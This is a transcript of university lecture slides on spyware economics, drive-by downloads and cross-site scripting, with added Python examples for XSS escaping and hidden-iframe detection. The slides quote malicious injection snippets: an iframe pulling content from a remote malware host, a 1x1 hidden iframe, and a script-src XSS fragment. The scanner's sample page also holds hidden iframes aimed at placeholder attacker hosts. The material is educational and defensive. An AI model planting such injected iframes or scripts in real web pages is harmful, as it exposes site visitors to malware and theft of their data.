CSCD 303 Essential Computer Security Spring 2013 - PowerPoint PPT Presentation


Slides: 51
Provided by: csf70

CSCD 303 Essential Computer Security Spring 2013
Lecture 13 Internet Security Continued
Adware and Spyware Reading Book - Chapter 20

  • Spyware/Adware
  • What is it, who is responsible?
  • How do you get infected?
  • Drive-by Downloads and XSS Revisited

What is Adware?
  • Adware
  • Long ago ... we had shareware programs (still do)
  • Adware was distributed with shareware programs to
    pay for the program and to get people to upgrade!

Eudora for Mac
Ads in free version
What is Adware?
  • Adware
  • Legitimate revenue source for companies who offer
    free software
  • How else are they going to get paid?
  • Is Adware malicious?
  • Adware is not malicious
  • Not supposed to track your habits or provide
    information about you to a third party
  • This type of adware is simply serving up random
    paid ads within the program
  • If you uninstall the program, Ads go away!!!

What is Spyware
  • When adware becomes intrusive, tracking your
    browsing habits or recording information about
    you ...
  • Then it becomes Spyware
  • You want to avoid it for privacy and security reasons
  • Spyware evolved from Adware
  • People have trouble telling the difference between
    adware and spyware

Spyware Defined
  • Spyware is one type of malicious software
    (malware) that collects information from a
    computing system without your consent
  • Spyware can capture keystrokes, screenshots,
    authentication credentials, personal email
    addresses, web form data, internet usage habits,
    and other personal information.

  • Is it always downloaded without the user's knowledge?
  • Not always ...
  • Licensing agreements that accompany software
    downloads sometimes warn of a spyware program
  • Licensing agreements are often hard-to-read legal
    disclaimers not read by users (including me)

EULA Showing Spyware
Dangers of Spyware
  • Is Spyware dangerous? What can it do?
  • 1. Record private data and transmit it to a third party
  • Spyware can collect technical information about the
    user's computer
  • Some threats will attempt to steal passwords and
    usernames, often for online banking but other
    things too

Dangers of Spyware
  • 2. Take over your computer
  • Change Web browser settings:
    homepage, search page, bookmarks
  • Download and install files without notifying you
    or requesting permission

Dangers of Spyware
  • 3. Shut down a program, disable or shut down a PC,
    slow it down
  • Plenty of Spyware is poorly written and prone to
  • Can lock up your machine
  • Some Spyware intentionally disables security
    software like firewalls and anti-virus programs
  • Remote Administration Tools (RATs) allow shutting
    down or restarting the PC
  • Adds processes that run in the background, slowing
    down the PC

Purpose of Spyware
  • What is the point of spyware?
  • Not a virus or worm, not trying to harm your PC
  • Want you to connect to Internet, show you ads or
    direct you to sites with ads
  • You are supposed to buy something!!
  • Considered a multi-million dollar business

How the Money Flow Works
  • Direct Advertising Online
  • Dell, Verizon, Citibank, Netflix, Viagra resellers
  • Put ads out online ... pay Internet Advertisers
  • Internet Advertisers
  • Middlemen, place company ads on popular websites
  • Hire Spyware Companies

How the Money Flow Works
  • Spyware Companies
  • Create actual spyware programs
  • 180 Solutions, Direct Revenue, Claria, eXact
  • Software Bundlers
  • Sell or distribute Shareware programs, browser
    toolbars; earn money by agreeing to include spyware
    with their own program

How the Money Flow Works
  • Affiliates
  • Website operators who agree to offer spyware
    infected programs on their sites
  • Example: eXact Advertising spyware company, runs
  • Everyone in the chain benefits
  • Big company ads are all over the Internet
  • Internet ad brokers are paid by the companies; they in
    turn pay the spyware makers, who in turn pay the software
    bundlers and affiliates, who get paid each time spyware
    gets installed on a computer

How the Money Works
  • Website owner joins an affiliate program
  • Gets paid each time people click an ad
  • Or,
  • Might want to shortcut this process
  • Put Spyware on people's machines; when people click on
    the ad to close it, that counts as a click and the
    website owner gets paid

Spyware Stats
  • In the first half of 2007, spyware infections
    prompted 850,000 U.S. households to replace their
    computers
  • 1 out of every 11 surveyed had a major, often
    costly problem due to spyware
  • Economic fallout per incident was $100, with
    damage totaling $1.7 billion
  • http://spywareeducationcenter/spyware_statistics.php

Spyware Examples
  • Similar to virus classification, where there are
    many similar viruses ...
  • Spyware is grouped into "families" based not on
    shared program code, but on common behaviors
  • Or by "following the money" of financial or
    business connections

Real Examples
  • CoolWebSearch
  • Group of programs that takes advantage of Internet
    Explorer vulnerabilities
  • Directs traffic to advertisements on Web sites
  • Zango (formerly 180 Solutions)
  • Transmits detailed information to advertisers
    about the Web sites which users visit
  • Also alters HTTP requests for affiliate
    advertisements linked from a Web site,
  • Advertisements make unearned profit for the 180
    Solutions Company
  • However, they went bust in 2009 !!!!

Real Examples
  • HuntBar, aka WinTools or Adware.WebSearch
  • Installed by an ActiveX drive-by download at
    affiliate Web sites, or
  • By advertisements displayed by other SpyWare
  • Example of how SpyWare can install more SpyWare
  • Adds toolbars to IE,
  • Tracks browsing behavior,
  • Redirects affiliate references, and
  • Displays advertisements

Real Examples
  • Zlob Trojan or just Zlob
  • Downloads itself to your computer via ActiveX
  • Reports back to a Control Server
  • Information can be your search history, Websites
    you visited, and even keystrokes

Infection Details
  • Spyware can be installed with programs downloaded
    off the Internet
  • They either ask you to click on something OR
  • Are Drive-by downloads
  • The only warning you might get would be your
    browser's standard message telling you the name
    of the software and asking if it's okay to install it

Infection Vector
  • Browser Add-ons
  • Pieces of software that add enhancements to your Web
    browser, like a toolbar, animated pal or
    additional search box
  • Can include elements of spyware as part of the add-on
  • Or sometimes they are nothing more than thinly
    veiled spyware themselves

Bonzi Buddy
Infection Vector
  • Piggybacked software installation
  • Particularly peer-to-peer file-sharing clients
  • Will install spyware as a part of their
    standard install
  • Kazaa and others have been known to install spyware

Infection Vector
  • Internet advertising companies such as Valueclick
    or DoubleClick will install cookies on your computer
    every time you load one of their advertising banners
  • Cookies allow them to see what sites you go to
    and what you do on these sites

  • Drive-by Downloads

Serious Vulnerability
  • Drive-by Downloads
  • What are these?
  • Drive-by downloads are caused when a user visits
    a website that exploits browser vulnerabilities
    and launches the automatic download and
    installation of malware without the knowledge or
    permission of the user

Serious Vulnerability
  • Drive-by Downloads
  • Software gets installed without your permission
  • In IE, you might see a warning dialog box
  • In non-IE browsers, you will not see anything
  • May ask you to click on a link, or can just
    install without your consent if you are running
    as administrator
  • Used for spyware, but also for worms, viruses and
    other malware!

Serious Vulnerability
  • Many Drive-by Downloads are done with an iFrame
  • An iframe is an HTML element that embeds an HTML
    document within an already existing document
  • Not all iframes are evil, but some are!!
  • Iframes are often used to insert ads within a webpage
  • <iframe src="http://q0i.ru:8080/index.php" width="114"
    height="190" style="visibility...">
  • This is the iframe in text; you can easily see it on
    the page
  • Then, they obfuscate it so that it is not easily
Drive-by Downloads
  • Embed this on a web page on a normal, typically
    visited site
  • Hard to figure out what this is doing
  • Advertisers obfuscate their code to protect their

Drive-by Downloads
  • iframes are not always used for evil
  • Frequent use, for example:
  • Embed remotely hosted dynamic content such as
    online maps into web pages
  • When used by malicious attackers,
  • the iframe can be made so small that it is invisible,
  • Visitor to the infected page never knows that another
    page is also loading in the tiny iframe window

Drive-by Downloads Web Pages and Browsers
  • Two parts to this problem
  • 1. Getting it onto the Web page so visitors will be
    exposed to it
  • 2. Executing it in the user's browser so you get
    infected

Drive-by Downloads Web Pages and Browsers
  • Getting it onto Web pages
  • a) Can infect the Web Server
  • Remote exploitation of Web servers is increasing
  • Attackers can compromise a Web server and inject
    malicious content
  • They do this by compromising the web server via:
  • Password guessing, an OS vulnerability, a Web Server
    vulnerability (Apache or IIS), SQL Injection
  • Inject scripts into the SQL database as part of Web

Modern Example of Web Site Infection
  • Webroot article describes an Apache 2.x stealth module
  • States that the underground criminal element
    marketed this Apache 2.x module
  • Capable of mass iFrame injection
  • Stealthy in that it rotated iFrames on all pages
    of a particular website
  • Module would not reveal the iFrame URL to search engines
  • Cost $1000
  • Used to distribute fake antivirus products

Drive-by Downloads Web Pages and Browsers
  • Getting it onto Web pages
  • b) XSS Cross Site Scripting
  • Upload content onto user-supplied pages or
    through forms that don't check for script input
  • <SCRIPT/SRC="http://"></SCRIPT>
  • Users will get pages loaded into their browsers
    with embedded, often hidden elements that run
What is XSS? Cross Site Scripting
  • XSS is executing arbitrary JavaScript code on
    the page.
  • This could be JavaScript that is inserted into
    the URL or through form submissions
  • If either of those ways of accepting
    information doesn't "clean" the information it is
    getting before outputting it again on the page
  • Then arbitrary JavaScript can run on that page,
    and that's an XSS vulnerability
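The "doesn't clean the information before outputting it again" point above, as an added example that is not part of the lecture: a reflected search page rendered once without output encoding and once with it. The URL, the `q` parameter and the helper names are constructed for this illustration.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Vulnerable: the search term taken from the URL is copied straight into
# the HTML response, so any markup the visitor (or a crafted link) supplies
# becomes part of the page.
def render_results_vulnerable(query):
    return f"<h1>Results for: {query}</h1>"

# Fixed: every untrusted value is HTML-escaped before it is output again,
# so '<' becomes '&lt;' and the browser treats it as text, not markup.
def render_results_fixed(query):
    return f"<h1>Results for: {escape(query, quote=True)}</h1>"

def query_from_url(url):
    # Pull the 'q' parameter out of a request URL (constructed helper).
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]

def contains_script(html):
    # Crude check used only to show the difference: did a <script> tag survive?
    return "<script" in html.lower()

if __name__ == "__main__":
    # Constructed request: the attacker-supplied term carries a script tag.
    url = "https://shop.example/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
    q = query_from_url(url)
    print(render_results_vulnerable(q))  # script tag reaches the page: XSS
    print(render_results_fixed(q))       # rendered harmlessly as text
```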

Drive-by Downloads Web Pages and Browsers
  • Two ways of infection
  • 1. Trick you into clicking something
  • 2. Exploits flaw in your Web Browser

Drive-by Downloads Web Pages and Browsers
  • 1. Trick you into clicking
  • As usual, you must load a viewer to see some
    interesting pictures, or view a movie clip
  • You can also download software or pictures
  • Or, you can appear to have been hijacked by fake
  • Good example of this

Drive-by Downloads Web Pages and Browsers
  • 2. Exploits a flaw in the Web Browser or
    an unpatched browser plug-in, a vulnerable
    ActiveX control, or any other third party
    software flaw
  • How it works
  • User surfs to a Website that has been rigged with
    code that in turn redirects the connection to a
    malicious third-party server hosting malware code
  • e.g., zero pixel IFRAMEs hide injected content

Drive-by Downloads Web Pages and Browsers
  • The following code is injected into web pages
  • Size of the in-line frame is 1 pixel by 1 pixel, so
    not visible to a visitor of the site unless the person
    looks at the source code:
    <iframe src="..." frameborder="0" width="1" height="1"
    scrolling="no" name="counter"></iframe></html>
  • Server's index.html file
    contains JavaScript code that attempts to exploit
    a recent Internet Explorer vulnerability to
    download, install, and run a malicious executable
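The two hidden-iframe shapes the slides show (the `style="visibility..."` frame and the 1x1 "counter" frame) are exactly what a defender looks for when checking a page for injected content. The following scanner is an added example, not code from the lecture; it runs Python's standard-library HTML parser over a constructed sample page with placeholder hosts and reports every iframe a visitor would not be able to see.

```python
import re
from html.parser import HTMLParser

# Constructed sample page (not from the lecture): one ordinary ad frame plus
# two frames hidden the way the slides describe. The hosts are placeholders.
SAMPLE_HTML = """
<html><body>
<p>Welcome to the site</p>
<iframe src="https://ads.example/banner" width="300" height="250"></iframe>
<iframe src="http://evil.example:8080/index.php" width="114" height="190"
        style="visibility: hidden"></iframe>
<iframe src="http://evil.example/counter" frameborder="0" width="1"
        height="1" scrolling="no" name="counter"></iframe>
</body></html>
"""

def _px(value):
    # Parse a width/height attribute ('1', '1px', '100%') to an int, or None.
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

def hidden_reason(attrs):
    """Return why an iframe would be invisible to a visitor, or None."""
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    if w is not None and h is not None and w <= 1 and h <= 1:
        return f"tiny frame {w}x{h}"          # the 1x1 "counter" trick
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "visibility:hidden" in style or "display:none" in style:
        return "hidden by CSS"                # the style="visibility..." trick
    return None

class HiddenIframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # list of (src, reason)

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        attrs = {k.lower(): v for k, v in attrs}
        reason = hidden_reason(attrs)
        if reason:
            self.findings.append((attrs.get("src", ""), reason))

def find_hidden_iframes(html):
    """Scan page source; return [(src, reason), ...] for every hidden iframe."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    return parser.findings
```

Running `find_hidden_iframes(SAMPLE_HTML)` flags the two hidden frames and leaves the visible 300x250 ad frame alone; obfuscated JavaScript that writes the iframe at runtime would need a different check, which this source-only scanner does not attempt.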

Steps for Drive-by Download
(Figure: popular website; browser gets redirected by a hidden link; downloads and executes hidden malware. Source: QSI Conference, August 26-27, 2008)
Steps for Drive-by Download
  • When a drive-by download occurs, the
    following steps usually take place
  • 1a) Attacker compromises a legitimate web server
    and inserts a script in a web application OR
  • 1b) Attacker has compromised User supplied web
  • 2) Victim visits the compromised web site
  • 3) Along with the requested page, the user gets the
    attacker-injected script
  • Script gets executed; it is either the exploit
    script or a script that imports it from a central
    exploit server
  • 4) A redirection starts from one web server to
    the other; these servers actually play the part of
    hop points

Steps for Drive-by Download
  • 5) Following a number n of redirections the victim
    reaches the central exploit server
  • 6) Server sends the exploit script
  • 7) Attacker gains control over the victim's
    system, after exploiting the vulnerability that
    was targeted
  • 8) Exploit instructs the browser to visit the
    malware distribution site. This is, actually,
    when the drive-by download starts
  • 9) Malware executables are downloaded
  • 10) The victim's computer automatically installs
    and executes the malicious code

Drive-by Downloads Web Pages and Browsers
  • After compromise,
  • Key loggers and other spyware installed
  • Your information flowing to attacker web sites

Example Drive-by
  • One high-profile web site compromise in 2007
  • Shows how drive-by downloads are launched against
    computer users
  • In the weeks leading up to the NFL Super Bowl,
    Miami's Dolphin Stadium site was hacked and
    rigged with a snippet of JavaScript

Example Drive-by
  • Visitors with an unpatched Windows machine were
    silently connected to a remote third-party server that
    attempted to exploit known vulnerabilities described by
    the MS06-014 and MS07-004 bulletins
  • If the exploit was successful, a Trojan was silently
    installed that gave the attacker full access to the
    compromised computer

Another Example of Drive-by
  • Trojan downloader loaded a keylogger onto users'
    computers
  • Stole passwords to WOW
  • Stolen accounts were sold on the Black Market
  • In this case, got onto the site through a vulnerability
    on the website
  • Allowed access to the site where they injected code
    that showed up on the website


No Lab this week !!! Midterm and Assignment Due